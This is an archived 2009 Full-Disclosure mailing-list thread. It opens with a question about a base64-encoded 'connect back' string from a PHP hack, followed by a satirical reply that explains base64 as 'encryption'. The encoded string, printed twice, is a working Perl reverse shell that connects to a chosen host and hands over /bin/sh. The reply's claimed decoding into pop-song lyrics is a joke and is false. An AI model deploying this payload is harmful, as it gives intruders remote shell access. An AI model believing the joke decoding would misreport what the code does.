| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 12 Feb 2009 00:52:40 -0600
From: Fredrick Diggle <fdiggle@...il.com>
To: "sr." <staticrez@...il.com>
Cc: Full-Disclosure <full-disclosure@...ts.grok.org.uk>,
pen-test list <pen-test@...urityfocus.com>
Subject: Re: connect back PHP hack
Fredrick Diggle Security has taken it upon itself to reverse this
highly mystical encryption schema and has employed its crack
cryptanalysis experts and reverse engineers including the highly
acclaimed Mustache to get answers to your questions.
The team has spent a restless 48 hours reverse engineering this schema
and presents the following formal analysis to the cryptographic
community at large.
1. High Level Overview
A 65-character subset of US-ASCII is used, enabling 6 bits to be
represented per printable character. (The extra 65th character, "=",
is used to signify a special processing function.)
The encoding process represents 24-bit groups of input bits as output
strings of 4 encoded characters. Proceeding from left to right, a
24-bit input group is formed by concatenating 3 8-bit input groups.
These 24 bits are then treated as 4 concatenated 6-bit groups, each
of which is translated into a single digit in the encrypted alphabet.
Each 6-bit group is used as an index into an array of 64 printable
characters. The character referenced by the index is placed in the
output string.
Table 1: Alphabetic Substitution
Value Encoding Value Encoding Value Encoding Value Encoding
0 A 17 R 34 i 51 z
1 B 18 S 35 j 52 0
2 C 19 T 36 k 53 1
3 D 20 U 37 l 54 2
4 E 21 V 38 m 55 3
5 F 22 W 39 n 56 4
6 G 23 X 40 o 57 5
7 H 24 Y 41 p 58 6
8 I 25 Z 42 q 59 7
9 J 26 a 43 r 60 8
10 K 27 b 44 s 61 9
11 L 28 c 45 t 62 +
12 M 29 d 46 u 63 /
13 N 30 e 47 v
14 O 31 f 48 w (pad) =
15 P 32 g 49 x
16 Q 33 h 50 y
Special processing is performed if fewer than 24 bits are available
at the end of the data being encoded. A full encoding quantum is
always completed at the end of a quantity. When fewer than 24 input
bits are available in an input group, zero bits are added (on the
right) to form an integral number of 6-bit groups. Padding at the
end of the data is performed using the '=' character. Since all encrypted
input is an integral number of octets, only the following cases
can arise:
(1) the final quantum of encoding input is an integral multiple of 24
bits; here, the final unit of encoded output will be an integral
multiple of 4 characters with no "=" padding,
(2) the final quantum of encoding input is exactly 8 bits; here, the
final unit of encoded output will be two characters followed by two
"=" padding characters, or
(3) the final quantum of encoding input is exactly 16 bits; here, the
final unit of encoded output will be three characters followed by one
"=" padding character.
2. Illustrations and examples
To translate between binary and this encryption schema, the input is stored
in a structure and the output is extracted. This relationship is
displayed in the following figure.
+--first octet--+-second octet--+--third octet--+
|7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|7 6 5 4 3 2 1 0|
+-----------+---+-------+-------+---+-----------+
|5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|5 4 3 2 1 0|
+--1.index--+--2.index--+--3.index--+--4.index--+
The following is an example of this schema in use.
Input data: 0x14fb9c03d97e
Hex: 1 4 f b 9 c | 0 3 d 9 7 e
8-bit: 00010100 11111011 10011100 | 00000011 11011001
11111110
6-bit: 000101 001111 101110 011100 | 000000 111101 100111
111110
Decimal: 5 15 46 28 0 61 37 62
Output: F P u c A 9 l +
Input data: 0x14fb9c03d9
Hex: 1 4 f b 9 c | 0 3 d 9
8-bit: 00010100 11111011 10011100 | 00000011 11011001
pad with 00
6-bit: 000101 001111 101110 011100 | 000000 111101 100100
Decimal: 5 15 46 28 0 61 36
pad with =
Output: F P u c A 9 k =
Input data: 0x14fb9c03
Hex: 1 4 f b 9 c | 0 3
8-bit: 00010100 11111011 10011100 | 00000011
pad with 0000
6-bit: 000101 001111 101110 011100 | 000000 110000
Decimal: 5 15 46 28 0 48
pad with = =
Output: F P u c A w = =
3. Conclusions
Given this analysis of the provided data it is clear that when
decrypted the clear text of the encrypted string :
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="
Becomes:
"I've had a little bit too much, much
All of the people start to rush, start to rush by
A dizzy twisted dance, can't find my drink, oh man
Where are my keys? I lost my phone, phone
What's going on on the floor?
I love this record baby but I can't see straight anymore
Keep it cool, what's the name of this club?
I can't remember but it's alright, a-alright
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance
Wish I could shut my playboy mouth, oh oh oh-oh
How'd I turn my shirt inside out? Inside outright
Control your poison babe, roses have thorns they say
And we're all getting hosed tonight, oh oh oh-oh
What's going on on the floor?
I love this record baby but I can't see straight anymore
Keep it cool, what's the name of this club?
I can't remember but it's alright, a-alright
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just
When I come through on the dance floor checkin' out that catalog
Can't believe my eyes, so many women without a flaw
And I ain't gon' give it up, steady tryin' to pick it up like a car
I'ma hit it, I'ma hit it and flex and do it until tomorr' yeah
Shawty I can see that you got so much energy
The way you're twirlin' up them hips 'round and 'round
And now there's no reason at all why you can't leave here with me
In the meantime stay and let me watch you break it down
And dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance
Woo! Let's go!
Half psychotic, sick, hypnotic
Got my blueprint, it's symphonic
Half psychotic, sick, hypnotic
Got my blueprint electronic
Half psychotic, sick, hypnotic
Got my blueprint, it's symphonic
Half psychotic, sick, hypnotic
Got my blueprint electronic
Go! Use your muscle, carve it out, work it, hustle
I got it, just stay close enough to get it
Don't slow! Drive it, clean it, Lysol, bleed it
Spend the last dough
(I got it)
In your pocko
(I got it)
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, da da doo-doo-mmm
Just dance, spin that record babe, da da doo-doo-mmm
Just dance, gonna be okay, d-d-d-dance
Dance, dance, just, j-j-just dance"
(c)opyright Fredrick Diggle Security 2009
On Tue, Feb 10, 2009 at 12:23 PM, sr. <staticrez@...il.com> wrote:
> can anyone tell me what encoding this is?
>
> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>
> this has to do with old php 4.x.x version with magic quotes enabled.
> i'm just trying to figure out what the connect back code does.
>
> any input is much appreciated.
>
> thx,
>
> sr.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists